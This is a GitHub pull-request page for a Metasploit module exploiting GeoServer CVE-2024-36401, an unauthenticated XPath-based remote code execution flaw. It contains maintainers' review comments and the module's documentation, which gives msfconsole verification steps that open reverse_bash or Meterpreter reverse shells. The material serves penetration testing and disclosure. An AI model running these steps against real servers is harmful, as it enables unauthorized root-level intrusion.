-
Notifications
You must be signed in to change notification settings - Fork 14.1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
GeoServer unauthenticated RCE [CVE-2024-36401] #19311
Conversation
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
Outdated
Show resolved
Hide resolved
Hey @h00die-gr3y, thanks for another great module and for adding the docs. I hope you don't mind me adding Windows support in 5d210b5. I saw the Windows installer and figure I'd take a crack at exploiting it. Let me know what you think of the addition. So far everything looks good. I'll take another look tomorrow. Testing was as expected on both operating systems I tested. TestingDocker vulhub/geoserver:2.23.2
Windows 10 GeoServer 2.25.0
Side noteI tried getting a Windows command stager target working for parity's sake although staged and stageless Meterpreter payloads both ending up failing. The staged payload failed because not all of the payload ends up getting base64 encoded and it runs into a parsing error
And I think the stageless meterpreter payload is just too large:
|
@jheysel-r7 Thanks for the windows addition. Quickly checked it on my Windows Server 2022 Standard installation.
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@h00die-gr3y thanks for testing the Windows target so quickly. Teamwork makes the exploits work :)
I've added a couple more minor comments but other than those this looks like it's ready to be landed.
modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
Outdated
Show resolved
Hide resolved
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
Outdated
Show resolved
Hide resolved
Release NotesThis adds an exploit module for CVE-2024-36401, an unauthenticated RCE vulnerability in GeoServer versions prior to 2.23.6, between version 2.24.0 and 2.24.3 and in version 2.25.0, 2.25.1. |
Hey @jheysel-r7 , @h00die-gr3y , @cgranleese-r7 ! I noticed that the Metasploit module for CVE-2024-36401 might not work if the expected FeatureTypes are deleted or replaced with custom ones. My exploit handles this by allowing custom FeatureTypes to be used, ensuring it still works. You can check out my code here for inspiration: https://github.com/Chocapikk/CVE-2024-36401/blob/main/exploit.py#L117 . In short, it just grab all the FeatureTypes without filtering as in the module. Improving the module to dynamically detect and validate available FeatureTypes could make it more robust. cc: @wvu |
@Chocapikk , |
GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets.
In the GeoServer versions prior to
2.23.6
, between version2.24.0
and2.24.3
and in version2.25.0
,2.25.1
, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names asXPath
expressions.An attacker can abuse this by sending a POST request with a malicious xpath expression to execute arbitrary commands as root on the system.
The following GeoServer releases are tested:
Osgeo.org Docker releases with Tomcat
Vulhub Docker releases with Jetty
Linux binary installs with Jetty
Installation steps to install the GeoServer web application
docker compose up -d
http://your_ip:8080/geoserver
.You are ready to test the module.
Verification Steps
msfconsole
use exploit/multi/http/geoserver_unauth_rce_cve_2024_36401
set rhosts <ip-target>
set rport <port>
set lhost <attacker-ip>
set target <0=Unix Command, 1=Linux Dropper>
exploit
reverse shell
orMeterpreter
session depending on thepayload
andtarget
settingsScenarios
GeoServer 2.23.5 on x64 Ubuntu 22.04 - cmd/unix/reverse_bash
GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - cmd/unix/reverse_bash
GeoServer 2.23.2 on vulhub docker image - cmd/unix/reverse_bash
GeoServer 2.23.2 on vulhub docker image - linux/x64/meterpreter_reverse_tcp
GeoServer 2.25.0 on osgeo.org/geoserver docker image - linux/x64/meterpreter_reverse_tcp
GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - linux/aarch64/meterpreter_reverse_tcp
Limitations
No limitations.